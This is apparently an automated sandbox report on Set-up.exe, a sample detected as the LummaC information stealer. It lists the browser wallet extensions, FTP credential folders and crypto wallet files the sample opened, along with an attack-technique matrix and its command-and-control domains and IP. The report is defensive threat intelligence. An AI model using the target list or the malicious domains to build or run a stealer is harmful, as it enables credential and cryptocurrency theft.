              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1840272460.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7104, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7104, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              Query Registry              		Remote Services41
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information              		LSASS Memory221
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
              Process Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Set-up.exe7%VirustotalBrowse
              Set-up.exe13%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              marketlumpe.biz100%Avira URL Cloudmalware
              nuttyshopr.biz100%Avira URL Cloudmalware
              https://rampnatleadk.click/(8Y100%Avira URL Cloudmalware
              https://rampnatleadk.click/apil7100%Avira URL Cloudmalware
              grandiouseziu.biz100%Avira URL Cloudmalware
              https://rampnatleadk.click/100%Avira URL Cloudmalware
              https://rampnatleadk.click/apiC8Yg100%Avira URL Cloudmalware
              https://rampnatleadk.click/:3ODr100%Avira URL Cloudmalware
              https://www.freetype.org/ttfautohint0%Avira URL Cloudsafe
              https://rampnatleadk.click/api100%Avira URL Cloudmalware
              littlenotii.biz100%Avira URL Cloudmalware
              https://rampnatleadk.click/apiK100%Avira URL Cloudmalware
              https://rampnatleadk.click/I8Xl100%Avira URL Cloudmalware
              https://rampnatleadk.click:443/api100%Avira URL Cloudmalware
              https://rampnatleadk.click/9100%Avira URL Cloudmalware
              rampnatleadk.click100%Avira URL Cloudmalware
              spookycappy.biz100%Avira URL Cloudmalware
              truculengisau.biz100%Avira URL Cloudmalware
              fraggielek.biz100%Avira URL Cloudmalware
              punishzement.biz100%Avira URL Cloudmalware
              https://rampnatleadk.click/apiz100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              rampnatleadk.click
              		172.67.139.144
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                nuttyshopr.biztrue
                • Avira URL Cloud: malware
                		unknown
                marketlumpe.biztrue
                • Avira URL Cloud: malware
                		unknown
                grandiouseziu.biztrue
                • Avira URL Cloud: malware
                		unknown
                https://rampnatleadk.click/apitrue
                • Avira URL Cloud: malware
                		unknown
                littlenotii.biztrue
                • Avira URL Cloud: malware
                		unknown
                spookycappy.biztrue
                • Avira URL Cloud: malware
                		unknown
                truculengisau.biztrue
                • Avira URL Cloud: malware
                		unknown
                rampnatleadk.clicktrue
                • Avira URL Cloud: malware
                		unknown
                fraggielek.biztrue
                • Avira URL Cloud: malware
                		unknown
                punishzement.biztrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabSet-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/ac/?q=Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgSet-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoSet-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://rampnatleadk.click/(8YSet-up.exe, 00000000.00000002.1910542741.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://rampnatleadk.click/apil7Set-up.exe, 00000000.00000003.1841233829.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864166986.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1857255847.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852213854.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Set-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://rampnatleadk.click/:3ODrSet-up.exe, 00000000.00000002.1910795263.0000000000DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://rampnatleadk.click/apiC8YgSet-up.exe, 00000000.00000003.1833921663.0000000003F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.rootca1.amazontrust.com0:Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Set-up.exe, 00000000.00000003.1794627775.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782851723.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1783081057.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782712260.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1794468638.0000000003F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Set-up.exe, 00000000.00000003.1794627775.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782851723.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1783081057.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782712260.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1794468638.0000000003F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.ecosia.org/newtab/Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://rampnatleadk.click/Set-up.exe, 00000000.00000003.1852213854.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1910542741.0000000000DAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://gcc.gnu.org/bugs.html):Set-up.exefalse
                                          		high
                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSet-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.microsoft.Set-up.exe, 00000000.00000002.1910542741.0000000000DAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.freetype.org/ttfautohintSet-up.exefalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://rampnatleadk.click/I8XlSet-up.exe, 00000000.00000002.1910795263.0000000000DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://rampnatleadk.click:443/apiSet-up.exe, 00000000.00000003.1805472670.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864394306.0000000000DD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiSet-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://x1.c.lencr.org/0Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://x1.i.lencr.org/0Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSet-up.exe, 00000000.00000003.1782851723.0000000003F34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSet-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://support.microsofSet-up.exe, 00000000.00000003.1782712260.0000000003F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://rampnatleadk.click/apiKSet-up.exe, 00000000.00000003.1794559739.0000000003F0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://rampnatleadk.click/9Set-up.exe, 00000000.00000003.1835478387.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1834001627.0000000003F06000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805472670.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805998934.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1833979280.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806263294.0000000003F06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSet-up.exe, 00000000.00000003.1782851723.0000000003F34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://support.mozilla.org/products/firefoxgro.allSet-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://rampnatleadk.click/apizSet-up.exe, 00000000.00000003.1833921663.0000000003F0A000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806991177.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805384068.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851850249.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805882594.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864327284.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1909389621.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1911159958.0000000003F12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1840080903.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806237333.0000000003F10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    172.67.139.144
                                                                    		rampnatleadk.clickUnited States
                                                                    		13335CLOUDFLARENETUStrue

                                                                    General Information

                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1589443
                                                                    Start date and time:2025-01-12 15:19:11 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 40s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:4
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Set-up.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                    EGA Information:Failed
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Stop behavior analysis, all processes terminated

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    09:20:13API Interceptor8x Sleep call for process: Set-up.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    172.67.139.144ATT00001.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      csrss.exeGet hashmaliciousMetasploitBrowse
                                                                        rlavBKPBEc.exeGet hashmaliciousMetasploitBrowse
                                                                          1dyvctHqv1.exeGet hashmaliciousMetasploitBrowse
                                                                            4t4y4r89UZ.exeGet hashmaliciousMetasploitBrowse
                                                                              0NlSa5bf55.exeGet hashmaliciousMetasploitBrowse
                                                                                f6oNLRKHUy.exeGet hashmaliciousMetasploitBrowse
                                                                                  jkDmft1Qoe.exeGet hashmaliciousMetasploitBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    rampnatleadk.clickrandom.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.79.9

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSPDF-523.msiGet hashmaliciousAteraAgentBrowse
                                                                                    • 104.18.18.106
                                                                                    E6wUHnV51P.exeGet hashmaliciousDCRatBrowse
                                                                                    • 104.21.12.142
                                                                                    gem2.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.64.1
                                                                                    gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    • 104.26.12.205
                                                                                    176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 172.67.160.193
                                                                                    https://accountsupporthub.es/generate/Login/Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.90.106
                                                                                    Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                    • 162.159.134.233
                                                                                    resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                    • 162.159.135.232
                                                                                    Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.219.181
                                                                                    http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.56.69

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    a0e9f5d64349fb13191bc781f81f42e1176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    x.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.139.144
                                                                                    b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
